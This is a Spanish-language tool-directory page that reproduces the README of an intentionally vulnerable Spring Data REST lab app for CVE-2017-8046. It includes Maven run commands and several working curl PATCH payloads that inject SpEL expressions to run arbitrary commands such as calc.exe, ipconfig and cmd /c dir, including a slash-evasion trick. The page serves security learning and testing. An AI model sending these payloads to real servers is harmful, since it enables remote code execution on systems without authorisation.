Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
SpringBreakVulnerableApp — ADVERTENCIA: Esta es una aplicación vulnerable para probar el exploit de la vulnerabilidad Spring Break (CVE-2017-8046). ¡Ejecútela bajo su propio riesgo! | Kitploit
Herramientas/GitHubGitHub/m3ssap0/springbreakvulnerableapp
Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubm3ssap0/springbreakvulnerableapp

SpringBreakVulnerableApp

ADVERTENCIA: Esta es una aplicación vulnerable para probar el exploit de la vulnerabilidad Spring Break (CVE-2017-8046). ¡Ejecútela bajo su propio riesgo!

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
1410hace 7 añosAún no revisado

Aplicación Vulnerable Spring Break

Esta es una aplicación vulnerable para probar el exploit de la vulnerabilidad Spring Break (CVE-2017-8046).

¡ADVERTENCIA!

Esta aplicación contiene graves vulnerabilidades de seguridad. ¡Ejecútela bajo su propio riesgo! Se recomienda usar un entorno respaldado y aislado (como una máquina virtual con una instantánea reciente y redes solo anfitrión). No suba esta aplicación a ningún servidor expuesto a Internet, ya que se verán comprometidos.

DESCARGO DE RESPONSABILIDAD: No me hago responsable de la forma en que alguien use esta aplicación (SpringBreakVulnerableApp). El único propósito de esta aplicación es ser un escenario de prueba para el exploit de Spring Break y no debe usarse de forma maliciosa. Si su servidor se ve comprometido mediante una instalación de SpringBreakVulnerableApp, no es mi responsabilidad, es responsabilidad de la(s) persona(s) que lo subieron e instalaron.

Información de la vulnerabilidad

  • CVE-ID: CVE-2017-8046
  • Enlace: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046
  • Descripción: Las solicitudes PATCH maliciosas enviadas a servidores spring-data-rest en Pivotal Spring Data REST versiones anteriores a 2.5.12, 2.6.7, 3.0 RC3, Spring Boot versiones anteriores a 2.0.0M4, y Spring Data lanzamientos anteriores a Kay-RC3 pueden usar datos JSON especialmente diseñados para ejecutar código Java arbitrario.

Uso

La aplicación se puede lanzar con el siguiente comando Maven.

root@kitploit:~
mvn spring-boot:run

Se puede generar un fat jar con el siguiente comando Maven.

root@kitploit:~
mvn clean install spring-boot:repackage

Para insertar datos puede usar el siguiente comando curl.

root@kitploit:~
curl -i -X POST -H "Content-Type: application/json" -d '{ "name" : "Test", "attribute" : "foo"}' http://hostname:port/entity

Exploit

Probablemente el exploit más simple es la siguiente solicitud.

root@kitploit:~
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(java.lang.Thread).sleep(10000).x", "value" : "pwned" }]' "http://hostname:port/entity/1"

En Windows, el proceso calc.exe se puede lanzar con la siguiente solicitud. Se pueden usar solicitudes similares para lanzar comandos arbitrarios.

root@kitploit:~
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(java.lang.Runtime).getRuntime().exec(\"calc.exe\").x", "value" : "pwned" }]' "http://hostname:port/entity/1/"

Para obtener la salida de los comandos lanzados, se pueden usar algunos "gadgets" ofrecidos por el código de Spring Framework. Afortunadamente, no se requieren dependencias externas. Por ejemplo, el resultado del comando ipconfig se puede recuperar con la siguiente solicitud.

root@kitploit:~
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec(\"ipconfig\").getInputStream(), T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x", "value" : "pwned" }]' "http://hostname:port/entity/1/"

En Windows, se puede lanzar un comando cmd /c dir y otros comandos similares con la siguiente solicitud. Tenga en cuenta el truco utilizado para insertar el carácter de barra evitando el valor explícito (es decir, las barras explícitas se reemplazan con puntos antes del análisis real).

root@kitploit:~
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec(\"cmd \" + T(java.lang.String).valueOf(T(java.lang.Character).toChars(0x2F)) + \"c dir\").getInputStream(), T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x", "value" : "pwned" }]' "http://hostname:port/entity/1/"

Se puede encontrar un programa Java para explotar esta vulnerabilidad aquí.

Autores

  • Antonio Francesco Sardella - implementación - m3ssap0

Licencia

Este proyecto está licenciado bajo la Licencia MIT - consulte el archivo LICENSE.txt para más detalles.

Agradecimientos

  • Man Yue Mo el investigador de seguridad que descubrió la vulnerabilidad
Descargar herramienta